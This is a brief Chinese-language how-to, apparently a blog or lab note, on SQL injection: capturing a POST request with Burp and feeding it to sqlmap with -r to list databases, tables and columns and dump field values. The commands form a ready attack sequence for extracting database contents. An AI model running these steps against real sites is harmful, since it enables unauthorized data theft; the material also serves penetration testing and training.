1.首先burp抓包,分析post包,保存为txt文件
(可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数)
2、使用sqlmap进行注入
爆数据库
sqlmap -r xxx.txt --dbs --batch
爆表名
sqlmap -r xxx.txt -D 数据库名 --table --batch
爆表中的字段
sqlmap -r xxx.txt -D 数据库名 -T 表名 --columns --batch
爆字段中的值
sqlmap -r xxx.txt -D 数据库名 -T 表名 -C '字段名' --dump --batch